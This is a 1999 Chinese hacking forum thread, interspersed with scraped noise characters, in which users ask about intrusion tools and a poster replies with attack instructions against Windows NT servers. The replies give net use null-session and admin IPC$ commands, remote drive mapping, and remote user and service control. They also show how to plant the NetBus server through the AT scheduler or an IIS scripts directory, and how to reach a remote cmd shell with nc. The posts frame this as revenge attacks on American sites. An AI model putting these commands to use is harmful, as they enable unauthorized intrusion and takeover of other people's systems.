《版主页黑客工具和文章的几个问题》中提到:+ T$ B* |& D* }
请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。: `# k9 Y. X, ~4 s3 F# E7 {6 R& Z4 G/ E
> 我的机子MMX166,WIN98,2。5G,32M内存。
+ z4 M6 M o4 {7 o, F$ P4 t8 M l7 S% R1 p
黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。4 _3 D S1 Q! _" @( l2 x, d9 s
你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。
+ M8 l7 v# N$ h* f* R, \其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:
7 ?! [+ c5 [6 |( U9 _, N$ Gnet use \\111.111.111.111\ipc$ "" /user:"" j0 L* c" n; k# w* _) u
net.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:
u7 _ @1 V# v* H% r6 c; N0 w( qnet view \\111.111.111.111
; q* e ]8 @/ r当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:1 \2 }9 ]' I0 G# E
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
: s D/ r( M) V4 c! Y& U命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:; t8 r% p! d6 V0 B. n& R ]8 Q1 X
1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:. T! g' }- N0 k$ U' y# k+ {) Y
net use x: \\111.111.111.111\c$
' N0 j9 n% q( Pnet use y: \\111.111.111.111\d$" S1 Q! J5 G5 G2 ~9 Z% A
这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...
6 Q9 G, g& |- r( N2、管理目标NT的用户:8 Y+ n4 O9 u& {: E
从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”
6 j0 `4 d( J: `! l0 x4 y键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样
7 q, h( P2 r. [- V& X: f3 @. ]3、管理目标NT的服务
; c2 Y) U/ l n# K6 h选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”
* G2 i+ O2 v: m: R这样你可以管理目标NT上的服务,共享目录
! M+ s0 f5 @3 b6 b. }" I1 t4、IIS管理
2 {/ q4 T" p1 \7 N选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111
: B; l5 T2 k' E p: R目标NT的FTP、WWW服务你就可以重新配置' _3 H# S* ]3 E) D8 t
5、事件管理
, U g; ^9 s& a! O1 t* o1 I“事件查看器”->连接到服务器->111.111.111.111. u0 ~1 p6 {9 j* n: z- i9 n5 ~. b- _# ~9 _
0 q4 e& P+ @; p/ g' l还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。
0 E% @! m0 P1 b% }' _2 O! F, g; M3 ]
当然,98,95也能做一些事情,但很麻烦,比如:
; `9 \/ H, n* S7 G- `3 u hnet use \\111.111.111.111\ipc$
+ V) C4 Y H4 ~# P: lnet use z: \\111.111.111.111\d$
j/ t2 a% U$ g' N+ W9 l但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等
. d. `% S2 C3 \$ F% [
% r/ k$ Y. c4 z- [" C) R我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!5 f" E$ j4 e" p' i
这样,你还可以了解目标机器上能有什么东东供你去用!4 B2 ~5 @5 o! F
" @$ k* n% x1 G c/ {
; v& g3 e3 B9 I3 S3 j4 A" d--------------------------------------------------------------------------------; X& b6 N) j7 l( ]# \. Z1 b
; r% {+ p* K- }. g' z
>quack于1999-06-12,23:37:447 H, @; s: r" a7 r+ d/ S2 O
在大作《几个有关黑的问题》中提到:. ]+ T, Y- a& n8 y' w
首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。
6 n. Q( S: p( i' C% ~- l+ K2 x4 N
, f( r5 R- E, e* O! O$ D$ @killusa于1999-06-13,03:25:15
' r. \" M/ R% o$ v1 O. M* d' H在大作《Re: 几个有关黑的问题》中提到:
/ o) W( S" \0 S3 S5 Q! j( {' j
) ]# x# V1 X3 a7 O2 w% f( s# \letmein.exe 暂时没有mypwd参数,十分抱歉
: W1 R- G8 q% {0 }) b: |pinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。" d* E& C2 P% K/ d# H* n! Q
6 `+ J* u! N+ h% t6 YNetbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的+ c6 @" y' U, S# v+ \) w
服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:
7 @. h9 p' ?$ w* {8 W; `
8 ~! M' P, B% ^# V% R5 A1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:# r. R5 n! S( I E- p, X8 i, E
5 l' ?; U7 a6 n, T3 F! t4 U
C:\>net start schedule- R' T4 T' Q1 l* b# g" V- J
Schedule 正在启动服务.....2 a6 I/ ^# W3 d% j' y7 {
Schedulw 服务启动成功。1 {0 J: }0 y6 v, k+ Z
C:\>at /?! i2 @* C; e: P4 z a
AT 命令排定在特定的日期和时间运行某些命令和程序。# C0 H& k+ [$ s8 l
运行 AT 命令之前必须先启动 Schedule 服务。3 d7 I' n# B. x! I- @* M4 E7 c
% ]* H, z. H7 }9 Y: `# A2 b3 N/ p i
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
1 R* g) n% j7 L4 M4 b2 M0 UAT [\\computername] time [/INTERACTIVE]
3 @% C. X+ i6 [: m9 K! O$ \[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
/ o+ ^% M0 r/ u6 q$ I5 A( O/ w' `/ A f& Y
\\computername 指定远程计算机。 如果省略这个参数
& Q3 h+ x/ V# @5 I命令会被排定在本机上运行。4 N* s5 `4 Y o7 g2 f5 ^
id 指定给排定进度命令的识别号。
9 O i5 H' a! G, F4 u4 O5 X7 R# W6 j. U6 Q
/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。3 L, I9 p; o+ `6 l
/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。$ ?9 z2 S8 C' Y" U" \
time 指定命令运行的时间。
7 d/ X( \' p* H/interactive 允许作业在运行时,与用户通过桌面交互。% B/ R1 P6 G; j
5 \( s& M& e1 U# s
/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。/ B) L! _: l6 d3 W
如果省略日期,则默认为在每月的本日运行。9 x4 l# \6 H2 l8 p9 c0 q
% l2 N' k9 x6 }8 _. p( h U
/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。
7 D/ s" E! V% s: ^
" I7 l4 c- b# N' _! e"command" 准备运行的 Windows NT 命令或批处理文件。) E8 ^0 E3 j3 v) x2 t- T& R
) `3 B o) G+ {C:\>* E! y. v; f0 N0 Z# y$ N
- m+ @, x6 w; H2 w1 Y: w知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:
' T$ v2 n$ y+ q, L* C* ]1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
" O! D, ^1 X; p1 G) {$ C2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start
+ l$ b6 y* _* u1 e% k3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后: s1 A% _9 R% d0 _# c
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
* z3 E8 c: V% Y; w/ j- ^0 [其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:
0 [/ l# a# ]+ Q5 iMicrosoft(R) Windows NT(TM)
1 y; U1 A$ }0 m( E(C) Copyright 1985-1996 Microsoft Corp.
- H( c+ G. k1 ]8 RC:\> P/ @) c7 w& k5 a3 o( j4 ]
+ `1 J5 D- g# W: m
2、利用web启动ntsrv.exe或其他程序在目的服务器& F/ F- U {- c1 `+ a. {: K/ Z
s3 X, B. W1 y& ^+ }
将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:% w2 j9 e, I7 e2 K! Q
http://x.x.x.x/scripts/ntsrv.exe /port:64321
# Q9 s4 Z. \9 T& E2 r或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321( p8 C0 M: F. k5 m- _
该程序就启动了
" u& \& V( E% j
3 |# g: y# C/ B( ?3 p我只提这几中方法!0 C# A& j( ~& L
要成功,必须打好基础工,对操作系统充分了解!8 j6 G, B+ q# O0 N; i% p! G1 a* j6 J
: U2 ?" _' t. ]+ ` |